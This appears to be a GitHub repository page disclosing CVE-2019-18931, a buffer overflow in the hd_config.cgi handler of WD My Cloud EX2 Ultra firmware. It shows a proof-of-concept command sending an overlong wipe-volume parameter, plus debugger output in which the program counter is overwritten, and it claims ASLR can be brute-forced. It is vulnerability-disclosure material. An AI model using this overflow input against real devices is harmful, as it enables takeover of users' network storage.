Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE/CVE-2019-18931/
CVE/CVE-2019-18931/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

CVE-2019-18931

Information

Target      : WD My Cloud EX2 Ultra
Version     : 2.31.195

Proof of Concept

$ qemu-arm-static -g 1234 -E "QUERY_STRING=cmd=cgi_FMT_Wipe_DiskMGR&f_wipe_volume_info=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&form=" -E REQUEST_METHOD=GET ~/afl/newpj3/targets/_hd_config.cgi/hd_config.cgi
gdb-peda$ info registers 
r0             0x9   0x9
r1             0x0   0x0
r2             0xf655d6b8   0xf655d6b8
r3             0xf655cd50   0xf655cd50
r4             0x61616161   0x61616161
r5             0x61616161   0x61616161
r6             0x61616161   0x61616161
r7             0x61616161   0x61616161
r8             0x0   0x0
r9             0xf67bf0f4   0xf67bf0f4
r10            0xf67fe000   0xf67fe000
r11            0x0   0x0
r12            0x3e   0x3e
sp             0xf6fff1b8   0xf6fff1b8
lr             0x61616161   0x61616161
pc             0x61616160   0x61616160
cpsr           0x20000030   0x20000030

Exploit

It is possible to control the PC register and bypass ASLR by doing brute force attack.

I will disclose an exploit code soon!